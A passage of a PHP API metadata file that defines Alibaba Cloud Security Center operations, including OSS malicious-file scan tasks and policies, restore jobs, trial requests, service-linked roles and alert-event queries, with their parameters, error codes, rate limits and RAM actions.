'schema' => ['description' => 'The check mode. Valid values:'."\n" ."\n" .'* **1**: checks all objects in the bucket.'."\n" .'* **2**: checks only new objects in the bucket.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'KeySuffixList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The suffixes of the objects that you want to check.'."\n", 'type' => 'array', 'items' => ['description' => 'The suffix of the object that you want to check.'."\n", 'type' => 'string', 'required' => false, 'example' => '.jsp', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'KeyPrefixList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The prefixes of the objects.'."\n", 'type' => 'array', 'items' => ['description' => 'The prefix of the object.'."\n", 'type' => 'string', 'required' => false, 'example' => '/root', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'AllKeyPrefix', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to match the prefixes of all objects.'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'DecompressMaxLayer', 'in' => 'query', 'schema' => ['description' => 'The maximum number of decompression levels when multi-level packages are decompressed. Valid values: 1 to 5. If the maximum number of decompression levels is reached, the decompression operation immediately ends and the detection of extracted objects is not affected.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'DecompressMaxFileCount', 'in' => 'query', 'schema' => ['description' => 'The maximum number of objects that can be extracted during decompression. Valid values: 1 to 1000. If the maximum number of objects that can be extracted is reached, the decompression operation immediately ends and the detection of extracted objects is not affected.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '100', 'title' => ''], ], [ 'name' => 'DecryptionList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The decryption methods.'."\n", 'type' => 'array', 'items' => ['description' => 'The decryption method. Valid values:'."\n" ."\n" .'* **OSS**: OSS-managed.'."\n" .'* **KMS**: Key Management Service (KMS).'."\n", 'type' => 'string', 'required' => false, 'example' => 'KMS', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'LastModifiedStartTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp when the object was last modified. The time must be later than the timestamp that you specify. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1724301769834', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'BBD75EC2-2F4F-5A7B-AA53-18724DC8****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ApiAuthExhausted', 'errorMessage' => 'No auth count or auth count has been exhausted.', 'description' => 'You have not purchased a quota, or the purchased quota is used up.'], ['errorCode' => 'TaskIsProcessing', 'errorMessage' => 'Task Is Processing.', 'description' => 'Task is processing.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'CreateOssBucketScanTask', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateOssBucketScanTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateOssBucketScanTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BBD75EC2-2F4F-5A7B-AA53-18724DC8****\\"\\n}","type":"json"}]', ], 'CreateOssScanConfig' => [ 'summary' => 'Creates a policy for detecting malicious Object Storage Service (OSS) objects by using the SDK for malicious file detection feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '172821', 'abilityTreeNodes' => ['FEATUREsasNPORLE'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Enable', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable the policy. Valid values:'."\n" ."\n" .'* **1**: yes'."\n" .'* **0**: no'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'ScanDayList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The days on which the scan is executed in a week.'."\n", 'type' => 'array', 'items' => ['description' => 'The day on which the scan is executed in a week.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'BucketNameList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The names of buckets.'."\n", 'type' => 'array', 'items' => ['description' => 'The name of the bucket.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cccarvato-oss****', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'KeySuffixList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The suffixes of the files to scan.'."\n", 'type' => 'array', 'items' => ['description' => 'The suffix of the file to scan.'."\n", 'type' => 'string', 'required' => false, 'example' => '.asp', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The time when the scan starts. The time must be in the HH:mm:ss format.'."\n", 'type' => 'string', 'required' => false, 'example' => '00:00:00', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The time when the scan ends. The time must be in the HH:mm:ss format.'."\n", 'type' => 'string', 'required' => false, 'example' => '01:01:00', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The policy name.'."\n", 'type' => 'string', 'required' => false, 'example' => 'testName', 'title' => ''], ], [ 'name' => 'KeyPrefixList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The prefixes of the objects.'."\n", 'type' => 'array', 'items' => ['description' => 'The prefix of the object.'."\n", 'type' => 'string', 'required' => false, 'example' => '/root', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'AllKeyPrefix', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to match the prefixes of all objects.'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'DecompressMaxLayer', 'in' => 'query', 'schema' => ['description' => 'The maximum number of decompression levels when multi-level packages are decompressed. Valid values: 1 to 5. If the maximum number of decompression levels is reached, the decompression operation immediately ends and the detection of extracted objects is not affected.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'DecompressMaxFileCount', 'in' => 'query', 'schema' => ['description' => 'The maximum number of objects that can be extracted during decompression. Valid values: 1 to 1000. If the maximum number of objects that can be extracted is reached, the decompression operation immediately ends and the detection of extracted objects is not affected.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '100', 'title' => ''], ], [ 'name' => 'DecryptionList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The decryption methods.'."\n", 'type' => 'array', 'items' => ['description' => 'The decryption method. Valid values:'."\n" ."\n" .'* **OSS**: OSS-managed.'."\n" .'* **KMS**: Key Management Service (KMS).'."\n", 'type' => 'string', 'required' => false, 'example' => 'KMS', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'LastModifiedStartTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp when the object was last modified. The time must be later than the timestamp that you specify. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1724301769834', 'title' => ''], ], [ 'name' => 'RealTimeIncr', 'in' => 'query', 'schema' => ['description' => 'Whether to enable real-time incremental detection. When this parameter is set to true, the parameters ScanDayList, StartTime, and EndTime are not effective.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '5DFD6277-CC36-57F7-ACE6-F5952123****', 'title' => ''], 'Id' => ['description' => 'The policy ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '210****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"5DFD6277-CC36-57F7-ACE6-F5952123****\\",\\n \\"Id\\": 0\\n}","type":"json"}]', 'title' => 'CreateOssScanConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateOssScanConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateOssScanConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'OssScanConfig', 'arn' => 'acs:yundun-sas:*:{#accountId}:ossscanconfig/*'], ], ], ], ], ], 'CreateRdDefaultSyncList' => [ 'summary' => 'Creates an automatic control policy for new accounts in the multi-account security management feature of Security Center. Member accounts under the automatic control policy folder are automatically added to the monitoring account list.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '213254', 'abilityTreeNodes' => ['FEATUREsas8YMQ5V'], ], 'parameters' => [ [ 'name' => 'FolderIds', 'in' => 'query', 'schema' => ['description' => 'The list of folder IDs in the resource directory.'."\n" ."\n" .'> You can call [GetRdTree](~~GetRdTree~~) to obtain folder IDs. Separate multiple folder IDs with commas (,). If you do not specify this parameter, the existing configuration list is cleared.', 'type' => 'string', 'required' => false, 'example' => 'fd-BwoXuf****,fd-CFamY7****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'BaseResult', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'BA674E4B-00CF-5DEA-8B92-360862FB5133', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Create an automatic control policy for new accounts in multi-account security management', 'description' => 'Call this operation by using the management account of the resource directory or the delegated administrator account of Security Center.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateRdDefaultSyncList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:CreateRdDefaultSyncList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BA674E4B-00CF-5DEA-8B92-360862FB5133\\"\\n}","type":"json"}]', ], 'CreateRestoreJob' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'create'], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server whose data you want to restore.'."\n", 'type' => 'string', 'required' => true, 'example' => 'inet-ecs-4e876cb0-09f7-43b8-82ef-4bc7a93769b5', 'title' => ''], ], [ 'name' => 'SnapshotId', 'in' => 'query', 'schema' => ['description' => 'The ID of the snapshot that you want to use for restoration.'."\n" ."\n" .'> You can call the [DescribeSnapshots](~~DescribeSnapshots~~) operation to obtain the value of this parameter.'."\n", 'type' => 'string', 'required' => true, 'example' => 's-00023dhaatxp18mh****', 'title' => ''], ], [ 'name' => 'SnapshotHash', 'in' => 'query', 'schema' => ['description' => 'The hash value of the snapshot.'."\n" ."\n" .'> You can call the [DescribeSnapshots](~~DescribeSnapshots~~) operation to obtain the value of this parameter.'."\n", 'type' => 'string', 'required' => true, 'example' => 'd4b399edaad94b038e8f91873f19e3eae010ca30798fc36db3a164dd343f****', 'title' => ''], ], [ 'name' => 'Target', 'in' => 'query', 'schema' => ['description' => 'The path to which you want to restore data.'."\n", 'type' => 'string', 'required' => true, 'example' => '/root/testfls', 'title' => ''], ], [ 'name' => 'SourceType', 'in' => 'query', 'schema' => ['description' => 'The type of the data source. Valid values:'."\n" ."\n" .'* **ECS_FILE**: backup snapshots for Elastic Compute Service (ECS) files'."\n" .'* **File**: backup snapshots for on-premises servers'."\n", 'type' => 'string', 'required' => false, 'example' => 'ECS_FILE', 'title' => ''], ], [ 'name' => 'VaultId', 'in' => 'query', 'schema' => ['description' => 'The ID of the backup vault that is used in the restoration task.'."\n" ."\n" .'> You can call the [DescribeSnapshots](~~DescribeSnapshots~~) operation to obtain the value of this parameter.'."\n", 'type' => 'string', 'required' => true, 'example' => 'v-0002n12wokck2q0x****', 'title' => ''], ], [ 'name' => 'SnapshotVersion', 'in' => 'query', 'schema' => ['description' => 'The version of the backup data.'."\n" ."\n" .'> You can call the [DescribeSnapshots](~~DescribeSnapshots~~) operation to obtain the value of this parameter.'."\n", 'type' => 'string', 'required' => true, 'example' => '165570544****', 'title' => ''], ], [ 'name' => 'Includes', 'in' => 'query', 'schema' => ['description' => 'The directory in which the files included in the restoration task are located. This parameter is specified when you create the anti-ransomware policy. The value is a directory that requires protection.'."\n", 'type' => 'string', 'required' => true, 'example' => '["root"]', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'BD4B24CE-E5C4-5727-B731-BE85F1D4****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'CreateRestoreJob', 'summary' => 'Creates a restoration task.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateRestoreJob'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateRestoreJob', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BD4B24CE-E5C4-5727-B731-BE85F1D4****\\"\\n}","type":"json"}]', ], 'CreateSasTrial' => [ 'summary' => 'Applies for a trial of Security Center.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '138066', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'TryVersion', 'in' => 'formData', 'schema' => ['description' => 'The trial edition. Valid values:'."\n" ."\n" .'* **3**: Enterprise'."\n" .'* **7**: Ultimate'."\n" ."\n" .'> You can call the [GetCanTrySas](~~2623574~~) operation to obtain the trial edition.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '7', 'title' => ''], ], [ 'name' => 'FromEcs', 'in' => 'formData', 'schema' => ['description' => 'Specifies whether the request is redirected from the Elastic Compute Service (ECS) console. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'TryType', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The trial type. Valid values:'."\n" ."\n" .'* **0**: trial prohibited'."\n" .'* **1**: first trial'."\n" .'* **2**: second trial'."\n" ."\n" .'> You can call the [GetCanTrySas](~~2623574~~) operation to obtain the trial type. You can start a trial only if this parameter is not set to 0.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], ], [ 'name' => 'RequestForm', 'in' => 'formData', 'style' => 'json', 'schema' => [ 'title' => '', 'description' => 'The reason why you apply for the trial. You must specify the reason for the second trial.'."\n", 'type' => 'object', 'properties' => [ 'TryReason' => ['description' => 'The reason why you apply for the trial.'."\n", 'type' => 'string', 'required' => false, 'example' => 'for poc', 'title' => ''], ], 'required' => false, 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'formData', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'BaseResult', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '9D22BDB7-C0**328A2B2E9', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'CreateSasTrial', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateSasTrial'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateSasTrial', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9D22BDB7-C0**328A2B2E9\\"\\n}","type":"json"}]', ], 'CreateServiceLinkedRole' => [ 'summary' => 'Creates a service-linked role and grants Security Center access to cloud resources.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '91938', 'abilityTreeNodes' => ['FEATUREsasAFG0OH'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ServiceLinkedRole', 'in' => 'query', 'schema' => ['description' => 'The service-linked role. Default value: **AliyunServiceRoleForSas**. Valid values:'."\n" ."\n" .'- **AliyunServiceRoleForSas**: the service-linked role for Security Center (SAS). Security Center uses this role to access your resources in other Alibaba Cloud services.'."\n" .'- **AliyunServiceRoleForSasCspm**: the service-linked role for Security Center - Cloud Security Posture Management (CSPM) (sas-cspm). sas-cspm uses this role to access your resources in other Alibaba Cloud services.', 'type' => 'string', 'required' => false, 'example' => 'AliyunServiceRoleForSas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response for creating a service-linked role and granting Security Center access to cloud resources.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID generated by Alibaba Cloud for this request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'B94243D2-9342-4D82-87B9-DF9A038A87E1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'NoPermission.RAM.SlrCreate', 'errorMessage' => 'You are not authorized to do ram:CreateServiceLinkedRole action.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Create a service-linked role and grant security center access to cloud resources', 'description' => 'For more information about service-linked roles, see [Service-linked roles](~~160674~~).', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateServiceLinkedRole'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateServiceLinkedRole', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"B94243D2-9342-4D82-87B9-DF9A038A87E1\\"\\n}","type":"json"}]', ], 'CreateServiceTrail' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '160790', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the instance to query. Valid values:'."\n" ."\n" .'- **cn-hangzhou** (default): Chinese mainland.'."\n" .'- **ap-southeast-1**: outside the Chinese mainland.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID generated by Alibaba Cloud for this request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'ServiceRoleNotEnabled', 'errorMessage' => 'Service role not enabled.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Create actionTrail data delivery', 'summary' => 'Creates a service trail.', 'description' => 'The **ActionTrail data delivery** feature requires Cloud Security Posture Management (CSPM) and security alerting to read ActionTrail data. To use this feature, enable the **ActionTrail data delivery** toggle in the Security Center console and authorize the service-linked role **AliyunServiceRoleForSas** for Security Center. After authorization, ActionTrail data is delivered to the LogStore of Security Center.'."\n" .'For more information about the service-linked role **AliyunServiceRoleForSas** for Security Center, see [Service-linked role for Security Center](~~460226~~).'."\n" .'### Before you begin ###'."\n" .'Before calling this operation, enable the **ActionTrail data delivery** toggle. For more information, see [Access control](~~197302~~).', 'extraInfo' => 'If you call the **CreateServiceTrail** operation and receive the error `ErrorCode: -103` with the message containing `illegal auth`, the **ActionTrail data delivery** toggle is not enabled in the Security Center console.'."\n" ."\n" .'Enable the **ActionTrail data delivery** toggle. For more information, see [Access control](~~197302~~).', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateServiceTrail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateServiceTrail', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'SasTrail', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:sastrail/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7\\"\\n}","type":"json"}]', ], 'CreateSimilarSecurityEventsQueryTask' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'create'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'SecurityEventId', 'in' => 'query', 'schema' => ['description' => 'The ID of the alert event.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '14323', 'title' => ''], ], [ 'name' => 'SimilarEventScenarioCode', 'in' => 'query', 'schema' => ['description' => 'The code of the alerting event that has the same type or rule hits.', 'type' => 'string', 'required' => false, 'example' => 'default', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '5861EE3E-F0B3-48B8-A5DC-A5080BFBE052', 'title' => ''], 'CreateSimilarSecurityEventsQueryTaskResponse' => [ 'description' => 'The response for creating a task to query similar alert events.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The task status. Valid values:'."\n" ."\n" .'- **New**: The task is created.'."\n" .'- **RetrievingData**: Data is being retrieved.'."\n" .'- **DataRetrieved**: Data is retrieved.'."\n" .'- **Processing**: The task is being processed.'."\n" .'- **Success**: The task is successful.'."\n" .'- **Failed**: The task failed.'."\n" .'- **PartialFailed**: The task partially failed.', 'type' => 'string', 'example' => 'New', 'title' => ''], 'TaskId' => ['description' => 'The ID of the task.', 'type' => 'integer', 'format' => 'int64', 'example' => '2915', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'SecurityEventNotExists', 'errorMessage' => 'Security event not exists.', 'description' => ''], ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Create a node to query alert events triggered by the same rule or Alarm Metric', 'summary' => 'Creates a node to query alert events triggered by the same rule or Alarm Metric through alerting.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateSimilarSecurityEventsQueryTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"5861EE3E-F0B3-48B8-A5DC-A5080BFBE052\\",\\n \\"CreateSimilarSecurityEventsQueryTaskResponse\\": {\\n \\"Status\\": \\"New\\",\\n \\"TaskId\\": 2915\\n }\\n}","type":"json"}]', ], 'CreateSoarStrategyTask' => [ 'summary' => 'Creates a task under My Policies in Task Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '91940', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], ], 'parameters' => [ [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The policy ID.'."\n" .'>Call the 